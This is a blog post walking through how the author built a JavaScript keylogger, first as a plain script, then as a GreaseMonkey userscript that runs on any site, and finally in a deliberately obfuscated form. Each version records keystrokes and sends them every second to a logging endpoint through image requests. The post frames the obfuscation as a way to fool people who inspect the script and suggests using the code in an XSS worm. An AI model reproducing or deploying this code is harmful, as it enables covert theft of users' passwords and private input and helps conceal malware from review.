Some days ago while I was writing the (traffic magnet) article HYGHAAZG and mentioned the keylogger, instantly it came to mind a userscript one. Googled a bit, but didn’t seem to find any (quite amazed)…
Having some time at hands today, I decided to make one myself. Basically I made it under three steps (was specially thought for a post). First of all this was the starting point of it, a.k.a. typical javascript keylogger:
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://localhost/junkylogger.php?keys='+keys;
keys = '';
}, 1000);
As you can see from the code a javascript keylogger is quite simple. Attach a function to the key pressing event, extract the character (the code of it) in the event and save it into a variable. Also declare a function (within an interval) that will send the logged keys to the backend which will save it into file/database.
As malefic as it seems you should be real lucky to succeed in using it as a relevant keylogger. It would be a good module in an XSS worm. Wanting more from a keylogger, I moved onward to GreaseMonkey which allows me to have a functional keylogger on every website I wish. Most of it it’s the same, difference is that I usedGM_setValue/GM_getValue for storing the keys and had to use unsafeWindowfor accesing the key pressing event.
GM_setValue('keys', '');
unsafeWindow.onkeypress = function(e) {
eventobj = window.event?event:e;
key = eventobj.keyCode?eventobj.keyCode:eventobj.charCode;
keys = GM_getValue('keys');
keys+= String.fromCharCode(key);
GM_setValue('keys', keys);
}
window.setInterval(function(){
new Image().src = 'http://localhost/junkylogger.php?keys='+GM_getValue('keys');
GM_setValue('keys', '');
}, 1000);
The next step was to give it a more obfuscated look, just to give a harder life to all those who understand Javascript to the minimum and take a look at the source of the script.
window.wrap = window;
wrap.strf = String.fromCharCode;
wrap.wind = strf(117,110,115,97,102,101,87,105,110,100,111,119);
wrap.ev = strf(111, 110, 107, 101, 121, 112, 114, 101, 115, 115);
GM_setValue('q','');
Function('func', wind+"."+ev+" = func")(function(e) {
e=window.event?window.event:e;
k=e.charCode?e.charCode:e.keyCode;
k=GM_getValue('q')+strf(k);
GM_setValue('q', k);
});
wrap.loc = strf(104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104);
wrap.loc+= strf(111, 115, 116, 47, 106, 117, 110, 107, 121, 108, 111, 103, 103, 101);
wrap.loc+= strf(114, 46, 112, 104, 112, 63, 107, 101, 121, 115, 61);
window.setInterval(function(){new Image().src=wrap.loc+GM_getValue('q');GM_setValue('q','')},1000);
No, by downloading this you won’t have all your keystrokes logged (unless someone hacked the server and replaced it) because for testing I’ve used a php file on my localhost for logging, and that remained in the examples also.
已有
